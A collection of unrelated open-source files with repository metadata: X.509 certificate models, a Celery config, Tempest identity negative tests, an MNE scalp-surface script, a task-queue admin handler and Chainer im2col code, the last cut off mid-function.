        return uuid.uuid4().int
class AbstractCa(BaseX509):
    """
    Abstract Ca model
    """

    class Meta:
        abstract = True
        verbose_name = _('CA')
        verbose_name_plural = _('CAs')

    def get_revoked_certs(self):
        """
        Returns revoked certificates of this CA
        (does not include expired certificates)
        """
        now = timezone.now()
        return self.cert_set.filter(
            revoked=True, validity_start__lte=now, validity_end__gte=now
        )

    def renew(self):
        """
        Renew the certificate, private key and
        validity end date of a CA
        """
        super().renew()
        # renewing a CA invalidates everything it signed: re-issue all certs
        for cert in self.cert_set.all():
            cert.renew()

    @property
    def crl(self):
        """
        Returns up to date CRL of this CA
        """
        revoked_certs = self.get_revoked_certs()
        crl = crypto.CRL()
        now_str = datetime_to_string(timezone.now())
        for cert in revoked_certs:
            revoked = crypto.Revoked()
            revoked.set_serial(bytes(str(cert.serial_number), 'utf8'))
            revoked.set_reason(b'unspecified')
            revoked.set_rev_date(bytes(str(now_str), 'utf8'))
            crl.add_revoked(revoked)
        # CRL signed with the CA key, valid for 1 day
        return crl.export(self.x509, self.pkey, days=1, digest=b'sha256')
# CAs are longer-lived than end-entity certs: override the inherited
# validity_end default with the CA-specific one.
AbstractCa._meta.get_field('validity_end').default = default_ca_validity_end
class AbstractCert(BaseX509):
    """
    Abstract Cert model
    """

    # Issuing CA; deleting the CA cascades to its certificates.
    ca = models.ForeignKey(
        swapper.get_model_name('django_x509', 'Ca'),
        on_delete=models.CASCADE,
        verbose_name=_('CA'),
    )
    revoked = models.BooleanField(_('revoked'), default=False)
    revoked_at = models.DateTimeField(
        _('revoked at'), blank=True, null=True, default=None
    )

    def __str__(self):
        return self.name

    class Meta:
        abstract = True
        verbose_name = _('certificate')
        verbose_name_plural = _('certificates')
        # Serial numbers only need to be unique per issuing CA.
        unique_together = ('ca', 'serial_number')

    def revoke(self):
        """
        * flag certificate as revoked
        * fill in revoked_at DateTimeField
        """
        now = timezone.now()
        self.revoked = True
        self.revoked_at = now
        self.save()
| {
"content_hash": "bc75f52fa6c1fe079017bbcbdc936324",
"timestamp": "",
"source": "github",
"line_count": 569,
"max_line_length": 87,
"avg_line_length": 33.96485061511424,
"alnum_prop": 0.5813929421504709,
"repo_name": "openwisp/django-x509",
"id": "b9dc05f8dbf3d89a4933a0b2fbbaceac3a36235c",
"size": "19326",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_x509/base/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "1028"
},
{
"name": "Dockerfile",
"bytes": "284"
},
{
"name": "HTML",
"bytes": "3161"
},
{
"name": "JavaScript",
"bytes": "1989"
},
{
"name": "Python",
"bytes": "145612"
},
{
"name": "Shell",
"bytes": "941"
}
],
"symlink_target": ""
} |
try:
from shutil import which
except ImportError:
raise ValueError("The current version of Python doesn't support the"
"function 'which', normally located in shutil")
__author__ = "Nicholas C. Pandolfi"
__copyright__ = "Copyright (c) 2016 Nicholas C. Pandolfi"
__credits__ = "Stack Exchange"
__license__ = "MIT"
__email__ = "npandolfi@wpi.edu"
__status__ = "Development"
| {
"content_hash": "6d8b033d1dd86df3362446432cec49e2",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 72,
"avg_line_length": 22.61111111111111,
"alnum_prop": 0.6461916461916462,
"repo_name": "nickpandolfi/Cyther",
"id": "02a82116ce5c653e8e1aa6d636ae0b3b17de524b",
"size": "597",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cyther/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "6412"
},
{
"name": "Makefile",
"bytes": "367"
},
{
"name": "Python",
"bytes": "98665"
}
],
"symlink_target": ""
} |
from unittest import TestCase
from mock import Mock
from rapid.workflow.queue_handlers.container_handlers.container_handler import ContainerHandler
class TestContainerHandler(TestCase):
    """Unit tests for ContainerHandler grain parsing and dispatch checks."""

    def setUp(self):
        self.container_handler = TestingContainerHandler(Mock())

    def test_get_grain_type_split_non_splitter(self):
        # A grain without '://' comes back wrapped in a one-element list.
        split = self.container_handler._get_grain_type_split('not splittable')
        self.assertEqual(['not splittable'], split)

    def test_get_grain_type_split_with_splitter(self):
        # A grain with '://' is split into [identifier, remainder].
        split = self.container_handler._get_grain_type_split('testing://worky!')
        self.assertEqual(['testing', 'worky!'], split)

    def test_can_process_work_request_with_bad_data(self):
        request = Mock(grain='bad')
        self.assertFalse(self.container_handler.can_process_work_request(request))

    def test_can_process_work_request_with_good_data(self):
        request = Mock(grain='testing://worky!')
        self.assertTrue(self.container_handler.can_process_work_request(request))

    def test_can_process_action_instance_with_bad_data(self):
        self.assertFalse(
            self.container_handler.can_process_action_instance({'grain': 'bad'}))

    def test_can_process_action_instance_with_good_data(self):
        self.assertTrue(
            self.container_handler.can_process_action_instance(
                {'grain': 'testing://again!'}))
class TestingContainerHandler(ContainerHandler):
    """Minimal concrete ContainerHandler used as a test double."""

    def cancel_worker(self, action_instance):
        # No-op stub: cancellation behaviour is irrelevant to these tests.
        pass

    def process_work_request(self, work_request, clients):
        # No-op stub.
        pass

    def process_action_instance(self, action_instance, clients):
        # No-op stub.
        pass

    @property
    def container_identifier(self):
        # Grains of the form 'testing://...' match this handler.
        return 'testing'
| {
"content_hash": "587924fa9ef83012ca453678479535ad",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 113,
"avg_line_length": 36.29545454545455,
"alnum_prop": 0.7188478396994364,
"repo_name": "BambooHR/rapid",
"id": "d006fc2d23fec8cf1bbb46baedb754219995ae9a",
"size": "1597",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/workflow/test_container_handler.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1235"
},
{
"name": "Mako",
"bytes": "1069"
},
{
"name": "Python",
"bytes": "665011"
},
{
"name": "Shell",
"bytes": "6411"
}
],
"symlink_target": ""
} |
"""
Create high-resolution head surfaces for coordinate alignment.
example usage: mne make_scalp_surfaces --overwrite --subject sample
"""
from __future__ import print_function
import os
import os.path as op
import sys
import mne
if __name__ == '__main__':
    from mne.commands.utils import get_optparser

    parser = get_optparser(__file__)

    parser.add_option('-o', '--overwrite', dest='overwrite',
                      action='store_true',
                      help='Overwrite previously computed surface')
    parser.add_option('-s', '--subject', dest='subject',
                      help='The name of the subject', type='str')
    parser.add_option('-f', '--force', dest='force', action='store_true',
                      help='Force transformation of surface into bem.')
    parser.add_option('-v', '--verbose', dest='verbose', action='store_true',
                      help='Print the debug messages.')

    options, args = parser.parse_args()

    env = os.environ
    # Subject can come from the command line or the SUBJECT env variable.
    subject = vars(options).get('subject', env.get('SUBJECT'))
    if subject is None:
        parser.print_help()
        sys.exit(1)
    overwrite = options.overwrite
    verbose = options.verbose
    force = '--force' if options.force else '--check'

    from mne.commands.utils import get_status_output

    def my_run_cmd(cmd, err_msg):
        # Run a shell command; echo output when verbose, abort on failure.
        sig, out, error = get_status_output(cmd)
        if verbose:
            print(out, error)
        if sig != 0:
            print(err_msg)
            sys.exit(1)

    if 'SUBJECTS_DIR' not in env:
        print('The environment variable SUBJECTS_DIR should be set')
        sys.exit(1)

    if not op.isabs(env['SUBJECTS_DIR']):
        env['SUBJECTS_DIR'] = op.abspath(env['SUBJECTS_DIR'])
    subj_dir = env['SUBJECTS_DIR']

    if 'MNE_ROOT' not in env:
        print('MNE_ROOT environment variable is not set')
        sys.exit(1)

    if 'FREESURFER_HOME' not in env:
        print('The FreeSurfer environment needs to be set up for this script')
        sys.exit(1)

    subj_path = op.join(subj_dir, subject)
    if not op.exists(subj_path):
        # Fixed message typo: "exits" -> "exist".
        print(('%s does not exist. Please check your subject directory '
               'path.' % subj_path))
        sys.exit(1)

    # Prefer the compressed MGZ volume if present.
    if op.exists(op.join(subj_path, 'mri', 'T1.mgz')):
        mri = 'T1.mgz'
    else:
        mri = 'T1'

    print('1. Creating a dense scalp tessellation with mkheadsurf...')

    def check_seghead(surf_path=op.join(subj_path, 'surf')):
        # mkheadsurf writes either lh.seghead or lh.smseghead; return the
        # first that exists, or None if neither does.
        for k in ['/lh.seghead', '/lh.smseghead']:
            surf = surf_path + k if op.exists(surf_path + k) else None
            if surf is not None:
                break
        return surf

    my_seghead = check_seghead()
    if my_seghead is None:
        cmd = 'mkheadsurf -subjid %s -srcvol %s >/dev/null' % (subject, mri)
        my_run_cmd(cmd, 'mkheadsurf failed')
    else:
        print('%s/surf/%s already there' % (subj_path, my_seghead))
        if not overwrite:
            # Fixed message typo: "exisiting" -> "existing".
            print('Use the --overwrite option to replace existing surfaces.')
            sys.exit()

    surf = check_seghead()
    if surf is None:
        print('mkheadsurf did not produce the standard output file.')
        sys.exit(1)

    fif = '{0}/{1}/bem/{1}-head-dense.fif'.format(subj_dir, subject)
    print('2. Creating %s ...' % fif)
    cmd = 'mne_surf2bem --surf %s --id 4 %s --fif %s' % (surf, force, fif)
    my_run_cmd(cmd, 'Failed to create %s, see above' % fif)
    levels = 'medium', 'sparse'
    for ii, (n_tri, level) in enumerate(zip([30000, 2500], levels), 3):
        my_surf = mne.read_bem_surfaces(fif)[0]
        # Fixed: the message previously said "medium" on both iterations;
        # report the actual decimation level.
        print('%i. Creating %s grade tessellation...' % (ii, level))
        print('%i.1 Decimating the dense tessellation...' % ii)
        points, tris = mne.decimate_surface(points=my_surf['rr'],
                                            triangles=my_surf['tris'],
                                            n_triangles=n_tri)
        out_fif = fif.replace('dense', level)
        print('%i.2 Creating %s' % (ii, out_fif))
        surf_fname = '/tmp/tmp-surf.surf'
        # convert points to meters, make mne_analyze happy
        mne.write_surface(surf_fname, points * 1e3, tris)
        # XXX for some reason --check does not work here.
        cmd = 'mne_surf2bem --surf %s --id 4 --force --fif %s'
        cmd %= (surf_fname, out_fif)
        my_run_cmd(cmd, 'Failed to create %s, see above' % out_fif)
        os.remove(surf_fname)
    sys.exit(0)
| {
"content_hash": "b91f8f3238d5ac61b1a706874a8daca2",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 78,
"avg_line_length": 36.048780487804876,
"alnum_prop": 0.5757780784844384,
"repo_name": "jaeilepp/eggie",
"id": "a1a18ffcfd328fac3b89fdc129444d84cb0103fb",
"size": "4679",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "mne/commands/mne_make_scalp_surfaces.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "3357472"
}
],
"symlink_target": ""
} |
from Unix import Unix
# Android build platform.
class Android(Unix):
    """Android platform; currently adds nothing beyond the Unix base."""

    def __init__(self):
        # Delegate all initialisation to the Unix base class.
        Unix.__init__(self)
"content_hash": "f27c20e7c4e1ff6a8ba652b2da341018",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 21,
"avg_line_length": 15.714285714285714,
"alnum_prop": 0.6636363636363637,
"repo_name": "dmsovetov/pygling",
"id": "b10c5d9c4a5ed444b80e1a11c5e693fc16e6ea2f",
"size": "1427",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Pygling/Platform/Android.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "5335"
},
{
"name": "Python",
"bytes": "231527"
},
{
"name": "Shell",
"bytes": "2859"
}
],
"symlink_target": ""
} |
import uuid
from tempest.api.identity import base
from tempest.common.utils import data_utils
from tempest import exceptions
from tempest import test
class UsersNegativeTestJSON(base.BaseIdentityV2AdminTest):
    """Negative tests for the identity v2 admin users API (JSON interface).

    Each test verifies that an invalid, unauthorized or unauthenticated
    request is rejected with the expected exception.
    """

    _interface = 'json'

    @classmethod
    def setUpClass(cls):
        super(UsersNegativeTestJSON, cls).setUpClass()
        # Alternate user credentials shared by the tests below.
        cls.alt_user = data_utils.rand_name('test_user_')
        cls.alt_password = data_utils.rand_name('pass_')
        cls.alt_email = cls.alt_user + '@testmail.tm'

    @test.attr(type=['negative', 'gate'])
    def test_create_user_by_unauthorized_user(self):
        # Non-administrator should not be authorized to create a user
        self.data.setup_test_tenant()
        self.assertRaises(exceptions.Unauthorized,
                          self.non_admin_client.create_user, self.alt_user,
                          self.alt_password, self.data.tenant['id'],
                          self.alt_email)

    @test.attr(type=['negative', 'gate'])
    def test_create_user_with_empty_name(self):
        # User with an empty name should not be created
        self.data.setup_test_tenant()
        self.assertRaises(exceptions.BadRequest, self.client.create_user, '',
                          self.alt_password, self.data.tenant['id'],
                          self.alt_email)

    @test.attr(type=['negative', 'gate'])
    def test_create_user_with_name_length_over_255(self):
        # Length of user name field should be restricted to 255 characters
        self.data.setup_test_tenant()
        self.assertRaises(exceptions.BadRequest, self.client.create_user,
                          'a' * 256, self.alt_password,
                          self.data.tenant['id'], self.alt_email)

    @test.attr(type=['negative', 'gate'])
    def test_create_user_with_duplicate_name(self):
        # Duplicate user should not be created
        self.data.setup_test_user()
        self.assertRaises(exceptions.Conflict, self.client.create_user,
                          self.data.test_user, self.data.test_password,
                          self.data.tenant['id'], self.data.test_email)

    @test.attr(type=['negative', 'gate'])
    def test_create_user_for_non_existent_tenant(self):
        # Attempt to create a user in a non-existent tenant should fail
        self.assertRaises(exceptions.NotFound, self.client.create_user,
                          self.alt_user, self.alt_password, '49ffgg99999',
                          self.alt_email)

    @test.attr(type=['negative', 'gate'])
    def test_create_user_request_without_a_token(self):
        # Request to create a user without a valid token should fail
        self.data.setup_test_tenant()
        # Get the token of the current client
        token = self.client.auth_provider.get_token()
        # Delete the token from database
        self.client.delete_token(token)
        self.assertRaises(exceptions.Unauthorized, self.client.create_user,
                          self.alt_user, self.alt_password,
                          self.data.tenant['id'], self.alt_email)

        # Unset the token to allow further tests to generate a new token
        self.client.auth_provider.clear_auth()

    @test.attr(type=['negative', 'gate'])
    def test_create_user_with_enabled_non_bool(self):
        # Attempt to create a user with a non-boolean 'enabled' value
        # should fail
        self.data.setup_test_tenant()
        name = data_utils.rand_name('test_user_')
        self.assertRaises(exceptions.BadRequest, self.client.create_user,
                          name, self.alt_password,
                          self.data.tenant['id'],
                          self.alt_email, enabled=3)

    @test.attr(type=['negative', 'gate'])
    def test_update_user_for_non_existent_user(self):
        # Attempt to update a non-existent user should fail
        user_name = data_utils.rand_name('user-')
        non_existent_id = str(uuid.uuid4())
        self.assertRaises(exceptions.NotFound, self.client.update_user,
                          non_existent_id, name=user_name)

    @test.attr(type=['negative', 'gate'])
    def test_update_user_request_without_a_token(self):
        # Request to update a user without a valid token should fail

        # Get the token of the current client
        token = self.client.auth_provider.get_token()
        # Delete the token from database
        self.client.delete_token(token)
        self.assertRaises(exceptions.Unauthorized, self.client.update_user,
                          self.alt_user)

        # Unset the token to allow further tests to generate a new token
        self.client.auth_provider.clear_auth()

    @test.attr(type=['negative', 'gate'])
    def test_update_user_by_unauthorized_user(self):
        # Non-administrator should not be authorized to update user
        self.data.setup_test_tenant()
        self.assertRaises(exceptions.Unauthorized,
                          self.non_admin_client.update_user, self.alt_user)

    @test.attr(type=['negative', 'gate'])
    def test_delete_users_by_unauthorized_user(self):
        # Non-administrator user should not be authorized to delete a user
        self.data.setup_test_user()
        self.assertRaises(exceptions.Unauthorized,
                          self.non_admin_client.delete_user,
                          self.data.user['id'])

    @test.attr(type=['negative', 'gate'])
    def test_delete_non_existent_user(self):
        # Attempt to delete a non-existent user should fail
        self.assertRaises(exceptions.NotFound, self.client.delete_user,
                          'junk12345123')

    @test.attr(type=['negative', 'gate'])
    def test_delete_user_request_without_a_token(self):
        # Request to delete a user without a valid token should fail

        # Get the token of the current client
        token = self.client.auth_provider.get_token()
        # Delete the token from database
        self.client.delete_token(token)
        self.assertRaises(exceptions.Unauthorized, self.client.delete_user,
                          self.alt_user)

        # Unset the token to allow further tests to generate a new token
        self.client.auth_provider.clear_auth()

    @test.attr(type=['negative', 'gate'])
    def test_authentication_for_disabled_user(self):
        # Disabled user's token should not get authenticated
        self.data.setup_test_user()
        self.disable_user(self.data.test_user)
        self.assertRaises(exceptions.Unauthorized, self.token_client.auth,
                          self.data.test_user,
                          self.data.test_password,
                          self.data.test_tenant)

    @test.attr(type=['negative', 'gate'])
    def test_authentication_when_tenant_is_disabled(self):
        # User's token for a disabled tenant should not be authenticated
        self.data.setup_test_user()
        self.disable_tenant(self.data.test_tenant)
        self.assertRaises(exceptions.Unauthorized, self.token_client.auth,
                          self.data.test_user,
                          self.data.test_password,
                          self.data.test_tenant)

    @test.attr(type=['negative', 'gate'])
    def test_authentication_with_invalid_tenant(self):
        # User's token for an invalid tenant should not be authenticated
        self.data.setup_test_user()
        self.assertRaises(exceptions.Unauthorized, self.token_client.auth,
                          self.data.test_user,
                          self.data.test_password,
                          'junktenant1234')

    @test.attr(type=['negative', 'gate'])
    def test_authentication_with_invalid_username(self):
        # Non-existent user's token should not get authenticated
        self.data.setup_test_user()
        self.assertRaises(exceptions.Unauthorized, self.token_client.auth,
                          'junkuser123', self.data.test_password,
                          self.data.test_tenant)

    @test.attr(type=['negative', 'gate'])
    def test_authentication_with_invalid_password(self):
        # User's token with invalid password should not be authenticated
        self.data.setup_test_user()
        self.assertRaises(exceptions.Unauthorized, self.token_client.auth,
                          self.data.test_user, 'junkpass1234',
                          self.data.test_tenant)

    @test.attr(type=['negative', 'gate'])
    def test_get_users_by_unauthorized_user(self):
        # Non-administrator user should not be authorized to get user list
        self.data.setup_test_user()
        self.assertRaises(exceptions.Unauthorized,
                          self.non_admin_client.get_users)

    @test.attr(type=['negative', 'gate'])
    def test_get_users_request_without_token(self):
        # Request to get list of users without a valid token should fail
        token = self.client.auth_provider.get_token()
        self.client.delete_token(token)
        self.assertRaises(exceptions.Unauthorized, self.client.get_users)
        self.client.auth_provider.clear_auth()

    @test.attr(type=['negative', 'gate'])
    def test_list_users_with_invalid_tenant(self):
        # Should not be able to return a list of all
        # users for a non-existent tenant

        # Assign invalid tenant ids
        invalid_id = list()
        invalid_id.append(data_utils.rand_name('999'))
        invalid_id.append('alpha')
        invalid_id.append(data_utils.rand_name("dddd@#%%^$"))
        invalid_id.append('!@#()$%^&*?<>{}[]')

        # List the users with invalid tenant id
        for invalid in invalid_id:
            self.assertRaises(exceptions.NotFound,
                              self.client.list_users_for_tenant, invalid)
class UsersNegativeTestXML(UsersNegativeTestJSON):
    """Run the same negative user tests against the XML interface."""
    _interface = 'xml'
| {
"content_hash": "92545f90691b16e38336933fe5958c40",
"timestamp": "",
"source": "github",
"line_count": 218,
"max_line_length": 77,
"avg_line_length": 44.908256880733944,
"alnum_prop": 0.6171603677221654,
"repo_name": "cloudbase/lis-tempest",
"id": "a584a7b8bba4a59e102f9c9902741db0bdfe806a",
"size": "10426",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tempest/api/identity/admin/test_users_negative.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3377111"
},
{
"name": "Shell",
"bytes": "8663"
}
],
"symlink_target": ""
} |
import ssl
from airflow import configuration
from airflow.exceptions import AirflowConfigException, AirflowException
from airflow.utils.log.logging_mixin import LoggingMixin
def _broker_supports_visibility_timeout(url):
return url.startswith("redis://") or url.startswith("sqs://")
log = LoggingMixin().log

broker_url = configuration.conf.get('celery', 'BROKER_URL')

broker_transport_options = configuration.conf.getsection(
    'celery_broker_transport_options'
)
if 'visibility_timeout' not in broker_transport_options:
    if _broker_supports_visibility_timeout(broker_url):
        # Add the default without discarding any other transport options
        # the user configured (previously the whole dict was replaced by
        # {'visibility_timeout': 21600}, silently dropping them).
        broker_transport_options['visibility_timeout'] = 21600

# Default configuration handed to the Celery app.
DEFAULT_CELERY_CONFIG = {
    'accept_content': ['json', 'pickle'],
    'event_serializer': 'json',
    'worker_prefetch_multiplier': 1,
    'task_acks_late': True,
    'task_default_queue': configuration.conf.get('celery', 'DEFAULT_QUEUE'),
    'task_default_exchange': configuration.conf.get('celery', 'DEFAULT_QUEUE'),
    'broker_url': broker_url,
    'broker_transport_options': broker_transport_options,
    'result_backend': configuration.conf.get('celery', 'RESULT_BACKEND'),
    'worker_concurrency': configuration.conf.getint('celery', 'WORKER_CONCURRENCY'),
}

celery_ssl_active = False
try:
    celery_ssl_active = configuration.conf.getboolean('celery', 'SSL_ACTIVE')
except AirflowConfigException:
    # A missing/invalid option simply means SSL stays off.
    log.warning("Celery Executor will run without SSL")

try:
    if celery_ssl_active:
        broker_use_ssl = {'keyfile': configuration.conf.get('celery', 'SSL_KEY'),
                          'certfile': configuration.conf.get('celery', 'SSL_CERT'),
                          'ca_certs': configuration.conf.get('celery', 'SSL_CACERT'),
                          'cert_reqs': ssl.CERT_REQUIRED}
        DEFAULT_CELERY_CONFIG['broker_use_ssl'] = broker_use_ssl
except AirflowConfigException:
    raise AirflowException('AirflowConfigException: SSL_ACTIVE is True, '
                           'please ensure SSL_KEY, '
                           'SSL_CERT and SSL_CACERT are set')
except Exception as e:
    raise AirflowException('Exception: There was an unknown Celery SSL Error. '
                           'Please ensure you want to use '
                           'SSL and/or have all necessary certs and key ({}).'.format(e))

result_backend = DEFAULT_CELERY_CONFIG['result_backend']
if 'amqp' in result_backend or 'redis' in result_backend or 'rpc' in result_backend:
    log.warning("You have configured a result_backend of %s, it is highly recommended "
                "to use an alternative result_backend (i.e. a database).", result_backend)
| {
"content_hash": "e8a87bb24fe733b1567a11d71a0f0a15",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 90,
"avg_line_length": 43.19672131147541,
"alnum_prop": 0.6717267552182163,
"repo_name": "andyxhadji/incubator-airflow",
"id": "d44f2b3448afff4e1555ab5ed2728671a835106b",
"size": "3447",
"binary": false,
"copies": "12",
"ref": "refs/heads/master",
"path": "airflow/config_templates/default_celery.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "69070"
},
{
"name": "Dockerfile",
"bytes": "2001"
},
{
"name": "HTML",
"bytes": "280687"
},
{
"name": "JavaScript",
"bytes": "1385620"
},
{
"name": "Mako",
"bytes": "1284"
},
{
"name": "Python",
"bytes": "4480490"
},
{
"name": "Shell",
"bytes": "41922"
}
],
"symlink_target": ""
} |
"""A handler that displays task information for a single queue."""
import datetime
import urllib
from google.appengine.api import apiproxy_stub_map
from google.appengine.api.taskqueue import taskqueue_service_pb
from google.appengine.api.taskqueue import taskqueue_stub
from google.appengine.tools.devappserver2.admin import admin_request_handler
from google.appengine.tools.devappserver2.admin import taskqueue_utils
# Upper bound on the number of tasks fetched for display on one page.
_TASKS_TO_LOAD = 1000

# TODO: Make "Run" work.
class TaskQueueTasksHandler(admin_request_handler.AdminRequestHandler):
  """A handler that displays task information for a single queue."""

  @staticmethod
  def _get_tasks(queue_name,
                 count,
                 start_task_name=None,
                 start_eta_usec=None):
    """Yield up to count tasks of queue_name as dicts.

    start_task_name and start_eta_usec, when given, act as the pagination
    cursor for the QueryTasks RPC.
    """
    request = taskqueue_service_pb.TaskQueueQueryTasksRequest()
    request.set_queue_name(queue_name)
    request.set_max_rows(count)
    if start_task_name is not None:
      request.set_start_task_name(start_task_name)
    if start_eta_usec is not None:
      request.set_start_eta_usec(start_eta_usec)
    response = taskqueue_service_pb.TaskQueueQueryTasksResponse()
    apiproxy_stub_map.MakeSyncCall('taskqueue',
                                   'QueryTasks',
                                   request,
                                   response)
    now = datetime.datetime.utcnow()
    for task in response.task_list():
      # Nothing is done with the body so save some memory and CPU by removing
      # it.
      task.set_body('')
      yield taskqueue_stub.QueryTasksResponseToDict(queue_name, task, now)

  @staticmethod
  def _delete_task(queue_name, task_name):
    """Delete one task; returns the service result code for that task."""
    request = taskqueue_service_pb.TaskQueueDeleteRequest()
    request.set_queue_name(queue_name)
    request.task_name_list().append(task_name)
    response = taskqueue_service_pb.TaskQueueDeleteResponse()
    apiproxy_stub_map.MakeSyncCall('taskqueue',
                                   'Delete',
                                   request,
                                   response)
    return response.result(0)

  @staticmethod
  def _run_task(queue_name, task_name):
    """Force immediate execution of one task; returns the result code."""
    request = taskqueue_service_pb.TaskQueueForceRunRequest()
    request.set_queue_name(queue_name)
    request.set_task_name(task_name)
    response = taskqueue_service_pb.TaskQueueForceRunResponse()
    apiproxy_stub_map.MakeSyncCall('taskqueue',
                                   'ForceRun',
                                   request,
                                   response)
    return response.result()

  def get(self, queue_name):
    """Render the task list page for queue_name."""
    super(TaskQueueTasksHandler, self).get()
    # .next() is Python 2 iterator syntax; this SDK code targets Python 2.
    queue_info = taskqueue_utils.QueueInfo.get(
        queue_names=frozenset([queue_name])).next()
    tasks = list(self._get_tasks(queue_name, count=_TASKS_TO_LOAD))
    self.response.write(
        self.render(
            'taskqueue_tasks.html',
            {'is_push_queue':
             queue_info.mode == taskqueue_service_pb.TaskQueueMode.PUSH,
             'page': self.request.get('page'),
             'queue_info': queue_info,
             'queue_name': queue_name,
             'tasks': tasks,
             'error': self.request.get('message')}))

  def post(self, queue_name):
    """Handle modifying actions and redirect to a GET page."""
    super(TaskQueueTasksHandler, self).post()
    task_name = self.request.get('task_name')
    if self.request.get('action:deletetask'):
      result = self._delete_task(queue_name, task_name)
    elif self.request.get('action:runtask'):
      result = self._run_task(queue_name, task_name)
    # NOTE(review): if the request carries neither action parameter,
    # 'result' is unbound and the comparison below raises NameError --
    # confirm the admin UI always sends exactly one of the two actions.
    if result == taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE:
      message = 'Queue "%s" not found' % queue_name
    elif result == taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK:
      message = 'Task "%s" not found' % task_name
    elif result != taskqueue_service_pb.TaskQueueServiceError.OK:
      message = 'Internal error'
    else:
      message = ''
    self.redirect(
        '%s?%s' % (self.request.path_url,
                   urllib.urlencode({'page': self.request.get('page'),
                                     'message': message})))
| {
"content_hash": "ded69a5ec09ffe69cdfb5bd7109bb89f",
"timestamp": "",
"source": "github",
"line_count": 112,
"max_line_length": 77,
"avg_line_length": 36.955357142857146,
"alnum_prop": 0.6267214302971732,
"repo_name": "GoogleCloudPlatform/python-compat-runtime",
"id": "ea5f11af297b43365ee45ae39a7ad5643a3477da",
"size": "4740",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "appengine-compat/exported_appengine_sdk/google/appengine/tools/devappserver2/admin/taskqueue_tasks_handler.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "30211"
},
{
"name": "HTML",
"bytes": "171272"
},
{
"name": "JavaScript",
"bytes": "414229"
},
{
"name": "Makefile",
"bytes": "2138"
},
{
"name": "PHP",
"bytes": "3132250"
},
{
"name": "Python",
"bytes": "11709249"
},
{
"name": "Shell",
"bytes": "1787"
}
],
"symlink_target": ""
} |
import numpy
from chainer import function_node
from chainer.utils.conv import col2im_cpu
from chainer.utils.conv import col2im_gpu
from chainer.utils.conv import im2col_cpu
from chainer.utils.conv import im2col_gpu
from chainer.utils import type_check
def _pair(x):
if hasattr(x, '__getitem__'):
return x
return x, x
def _col2im(x, *args, **kwargs):
    """Dispatch col2im to the CPU implementation for NumPy arrays,
    and to the GPU implementation otherwise."""
    impl = col2im_cpu if isinstance(x, numpy.ndarray) else col2im_gpu
    return impl(x, *args, **kwargs)
def _im2col(x, *args, **kwargs):
    """Dispatch im2col to the CPU implementation for NumPy arrays,
    and to the GPU implementation otherwise."""
    impl = im2col_cpu if isinstance(x, numpy.ndarray) else im2col_gpu
    return impl(x, *args, **kwargs)
class Im2Col(function_node.FunctionNode):

    """Im2Col function."""

    def __init__(self, ksize, stride, pad, cover_all, dilate):
        # Normalize every hyperparameter to an explicit (height, width) pair.
        self.kh, self.kw = _pair(ksize)
        self.sy, self.sx = _pair(stride)
        self.ph, self.pw = _pair(pad)
        self.dy, self.dx = _pair(dilate)
        self.cover_all = cover_all

    def check_type_forward(self, in_types):
        type_check._argname(in_types, ('x',))
        x_type = in_types[0]
        # Input must be a 4-D floating point array (n, c, h, w).
        type_check.expect(
            x_type.dtype.kind == 'f',
            x_type.ndim == 4
        )

    def forward(self, inputs):
        x, = inputs
        y = _im2col(
            x, self.kh, self.kw, self.sy, self.sx, self.ph, self.pw,
            cover_all=self.cover_all, dy=self.dy, dx=self.dx)
        n, c, kh, kw, out_h, out_w = y.shape
        # Collapse the (c, kh, kw) axes into one channel axis.
        return y.reshape(n, c * kh * kw, out_h, out_w),

    def backward(self, indexes, grad_outputs):
        # The gradient is the col2im-style fold performed by Im2ColGrad,
        # which needs the original input shape to reconstruct it.
        return Im2ColGrad((self.kh, self.kw), (self.sy, self.sx),
                          (self.ph, self.pw), self.cover_all,
                          (self.dy, self.dx), self.inputs[0].shape) \
            .apply(grad_outputs)
class Im2ColGrad(function_node.FunctionNode):

    """Im2Col gradient function."""

    def __init__(self, ksize, stride, pad, cover_all, dilate, in_shape):
        # Same hyperparameters as Im2Col, plus the shape of the original
        # input so the gradient can be folded back onto it.
        self.kh, self.kw = _pair(ksize)
        self.sy, self.sx = _pair(stride)
        self.ph, self.pw = _pair(pad)
        self.dy, self.dx = _pair(dilate)
        self.cover_all = cover_all
        self.in_shape = in_shape

    def check_type_forward(self, in_types):
        type_check._argname(in_types, ('gy',))
        gy_type = in_types[0]
        # Incoming gradient must be a 4-D floating point array.
        type_check.expect(
            gy_type.dtype.kind == 'f',
            gy_type.ndim == 4
        )

    def forward(self, inputs):
        _, c, h, w = self.in_shape
        gy, = inputs
        n, _, out_h, out_w = gy.shape
        # Undo the channel collapse done in Im2Col.forward before folding.
        gy = gy.reshape(n, c, self.kh, self.kw, out_h, out_w)
        gx = _col2im(
            gy, self.sy, self.sx, self.ph, self.pw, h, w, self.dy, self.dx)
        return gx,

    def backward(self, indexes, grad_outputs):
        # Double backprop: the gradient of col2im is im2col again.
        return Im2Col(
            (self.kh, self.kw), (self.sy, self.sx),
